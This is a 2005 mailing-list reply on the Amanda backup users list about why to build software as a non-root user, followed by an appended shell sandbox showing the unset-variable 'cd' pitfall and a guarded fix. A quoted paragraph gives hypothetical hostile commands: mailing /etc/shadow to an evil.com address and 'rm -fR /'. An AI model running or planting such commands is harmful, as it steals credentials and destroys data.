Amanda-Users

Re: Fedora Core 3 - which version of tar??

2005-01-21 22:54:03
Subject: Re: Fedora Core 3 - which version of tar??
From: Jon LaBadie <jon AT jgcomp DOT com>
To: amanda-users AT amanda DOT org
Date: Fri, 21 Jan 2005 22:42:56 -0500
On Fri, Jan 21, 2005 at 06:15:28PM -0600, Frank Smith wrote:
> 
> 
> --On Friday, January 21, 2005 18:18:52 -0500 Eric Siegerman <erics AT telepres DOT com> wrote:
> 
> > On Thu, Jan 20, 2005 at 10:22:16PM +0100, Stefan G. Weichinger wrote:
> >> - configure and make as $AMANDAUSER
> > 
> > I don't believe this is necessary.  One should avoid building
> > Amanda as root, but that's not because it'll cause problems for
> > Amanda; it's for the same reason one should avoid building
> > *anything* as root.
> 
> Sorry for hijacking a thread, but playing devil's advocate here,
> what difference does it really make whether you build as root
> or not if you run 'make install' as root?  How many people
> actually go through each line of the makefile, or run make -n
> first and examine all that, plus look through the code itself?
>    In Amanda's case, for example, if the source for runtar
> contained code to 'mailx hax0r AT evil DOT com < /etc/shadow' or
> 'rm -fR /' would it really make any difference what user it
> was compiled under?  Would they notice even if it wasn't buried
> in the source, but was just part of the 'install' target in
> the makefile (or an included subdirectory makefile)?
>    For user programs, compiling and installing as a user
> can limit the damage that can be done, but if any part of
> the build, install, or execution ever has root privileges
> then you really aren't increasing your security by building
> as a normal user and installing as root.
>    All that said, I generally do build as a normal user, as
> it can expose permission problems on libraries, paths, etc.
> at build time instead of later when users are trying to run
> the program.

You have said it yourself: as an ordinary user you limit the
possible problems.  Have you never looked at a file with
an editor and inadvertently modified it?  Don't you ever
make little changes to the code or makefiles?  How about
running your builds from a script as Gene H. does?  Or
running my configure with a script that modifies the makefiles
to allow me a target of *.i output files (post-preprocessor)?

I don't want to run these things as root.  There doesn't have
to be anything malicious to be dangerous or unwanted.  Just a
simple error that might cause less damage run by amanda than
run by root.  Or even by user jon.  Suppose I had a simple "cd"
in one of these scripts; like

   cd $AmandaBuildDir

But I forgot to properly set AmandaBuildDir, or I misspelled it
in the script.  Now it is a "cd <with no args>" meaning a cd to
the home directory of the person running it.  I would rather it
went to amanda's, not jon's and certainly not root's home dir
before continuing the script.

jl
-- 
Jon H. LaBadie                  jon AT jgcomp DOT com
 JG Computing
 4455 Province Line Road        (609) 252-0159
 Princeton, NJ  08540-4322      (609) 683-7220 (fax)
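
The unset-variable `cd` failure described in the message above, reproduced in a throwaway sandbox beside a guarded form. This is an added example, not code from the original post; the sandbox paths, the misspelled name `AmandaBuilDir` and the function names `fragile_cd` and `guarded_cd` are assumptions made for illustration.

```shell
#!/bin/sh
# Constructed sandbox: a fake HOME and build dir, so nothing real is touched.
SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
mkdir -p "$SANDBOX/home" "$SANDBOX/build"

# Fragile form from the message: when the variable is unset, the unquoted
# expansion disappears, the command becomes a bare "cd", and the script
# carries on in $HOME of whoever is running it.
fragile_cd() (
    set +u                       # plain-script default: unset expands to nothing
    HOME="$SANDBOX/home"
    cd $AmandaBuildDir && pwd -P
)

# Guarded form: ${var:?} makes the shell exit non-zero when the variable is
# unset or empty, so no later step runs in the wrong directory.
guarded_cd() (
    HOME="$SANDBOX/home"
    cd -- "${AmandaBuildDir:?build directory not set}" && pwd -P
) 2>/dev/null

# Reproduce the mistake: the right name is unset, the misspelled one is set.
unset AmandaBuildDir
AmandaBuilDir="$SANDBOX/build"

echo "fragile form continued in: $(fragile_cd)"
if guarded_cd >/dev/null; then
    echo "guarded form continued"
else
    echo "guarded form stopped before changing directory"
fi
```

Run as root, the fragile form would carry on in root's home directory; the guarded form stops regardless of which account runs it.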